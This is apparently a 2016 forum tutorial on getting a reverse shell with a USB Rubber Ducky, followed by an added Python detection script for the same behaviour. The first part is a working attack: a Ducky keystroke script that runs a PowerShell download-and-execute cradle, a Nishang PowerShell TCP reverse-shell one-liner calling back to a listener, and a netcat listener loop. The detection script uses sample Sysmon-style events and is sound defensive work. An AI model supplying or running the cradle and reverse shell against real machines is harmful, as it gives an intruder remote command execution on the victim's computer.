How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky

Post by jamied_uk on 3rd November 2016, 10:04

The Ducky Script

DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"

Replace the URL above with the address of your web server where we’ll be hosting the powershell reverse shell script.

HTTPS is highly encouraged for the web server. See Hak5 episode 2023 for a video tutorial on setting up a free Let’s Encrypt SSL certificate.

This very short USB Rubber Ducky payload simply opens the Windows run dialog, types in a single line of powershell and runs it. This powershell snippet will download and execute whatever other powershell script we host on our web server.

The Web Server

On our web server we’ll need to host the powershell reverse shell code. This powershell TCP one-liner from Nishang works great:

$sm=(New-Object Net.Sockets.TCPClient("hostofnetcatlistener",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

There are many more powerful reverse shells as part of the Nishang suite – but this one serves our example well. Host it on your web server as referenced by the ducky script above. Be sure to change the host and port in the code above to match those of your netcat listener.

The Netcat Listener

Now that we have our USB Rubber Ducky payload written and our powershell reverse shell code hosted on our web server we’re ready to set up the listener. A simple netcat -lp 4444 from our publicly accessible server referenced in the powershell above will do fine in this case.

To keep our netcat listener running even after a shell terminates we might want to wrap it in a simple bash loop.

while true; do nc -l -p 4444; done
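Seen from the blue-team side, the post describes two things that show up plainly in endpoint telemetry: a PowerShell download cradle (IEX plus a web fetch) on a process command line, and powershell.exe itself initiating an outbound TCP connection to a listener port. The following is an added detection example, not code from the post or from Nishang/Hak5. It assumes Sysmon-style event fields (Event ID 1 for process creation with CommandLine, Event ID 3 for network connections with Initiated/DestinationPort, ProcessGuid on both) and runs over constructed sample events; the cradle pattern is deliberately a little broader than the exact one-liner in the post so that common variants of the same fetch-and-evaluate shape are caught, and findings are correlated per process so a cradle followed by a non-web outbound connection from the same process is escalated.

```python
"""Detection logic for the two behaviours described in the post: a PowerShell
download cradle on a process command line (Sysmon Event ID 1 / Windows 4688)
and powershell.exe itself initiating an outbound TCP connection (Sysmon Event
ID 3). The event records below are constructed samples shaped like Sysmon
fields, not real telemetry."""
import re

# An expression evaluator combined with a web fetch in one command line is the
# download-cradle shape. Slightly broader than the post's exact cradle
# (IEX + Net.WebClient.DownloadString) so that common variants are caught.
EVALUATOR = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
FETCH = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b|net\.webclient",
    re.IGNORECASE,
)
WEB_PORTS = {80, 443}  # outbound here is "unusual"; any other port is "very unusual"


def is_download_cradle(cmdline: str) -> bool:
    """True when the command line both fetches remote content and evaluates it."""
    return bool(EVALUATOR.search(cmdline) and FETCH.search(cmdline))


def is_powershell_image(image: str) -> bool:
    """Match the executable name regardless of install path or case."""
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def severity(cradle: bool, web_ports: set, other_ports: set) -> str:
    """Escalate when one process both ran a cradle and opened a shell-like port."""
    if cradle and other_ports:
        return "critical"
    if cradle or other_ports:
        return "high"
    return "medium" if web_ports else "none"


def classify(events: list) -> dict:
    """Correlate events per process (ProcessGuid); return findings keyed by GUID."""
    state = {}
    for ev in events:
        if not is_powershell_image(ev.get("Image", "")):
            continue  # only PowerShell processes are in scope for these two rules
        s = state.setdefault(ev["ProcessGuid"], {"cradle": False, "web": set(), "other": set()})
        if ev["EventID"] == 1 and is_download_cradle(ev.get("CommandLine", "")):
            s["cradle"] = True
        elif ev["EventID"] == 3 and ev.get("Initiated", False):
            port = int(ev["DestinationPort"])
            (s["web"] if port in WEB_PORTS else s["other"]).add(port)
    findings = {}
    for guid, s in state.items():
        sev = severity(s["cradle"], s["web"], s["other"])
        if sev != "none":
            findings[guid] = {"severity": sev, "cradle": s["cradle"],
                              "ports": sorted(s["web"] | s["other"])}
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (Sysmon-like fields, shortened).
SAMPLE_EVENTS = [
    # Process A: the post's cradle, a fetch over 443, then a connection to 4444.
    {"EventID": 1, "ProcessGuid": "A", "Image": PS,
     "CommandLine": 'powershell "IEX (New-Object Net.WebClient).DownloadString(\'https://mywebserver/payload.ps1\');"'},
    {"EventID": 3, "ProcessGuid": "A", "Image": PS, "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "ProcessGuid": "A", "Image": PS, "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
    # Process B: routine admin use, no network activity.
    {"EventID": 1, "ProcessGuid": "B", "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Service"},
    # Process C: a browser talking to 443, out of scope for these rules.
    {"EventID": 3, "ProcessGuid": "C", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": True, "DestinationIp": "198.51.100.5", "DestinationPort": 443},
    # Process D: a download without evaluation, over a web port only.
    {"EventID": 1, "ProcessGuid": "D", "Image": PS,
     "CommandLine": "powershell Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip"},
    {"EventID": 3, "ProcessGuid": "D", "Image": PS, "Initiated": True,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

if __name__ == "__main__":
    for guid, finding in classify(SAMPLE_EVENTS).items():
        print(guid, finding)
```

Run as-is it reports process A as critical (cradle plus outbound 4444) and D as medium (fetch over 443 with no evaluation), while B and C produce no finding. In a real deployment the same two rules map onto Sysmon or EDR process and network events, and the per-process correlation is what keeps a plain Invoke-WebRequest from looking like a shell while still surfacing the fetch-then-connect sequence the post relies on.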

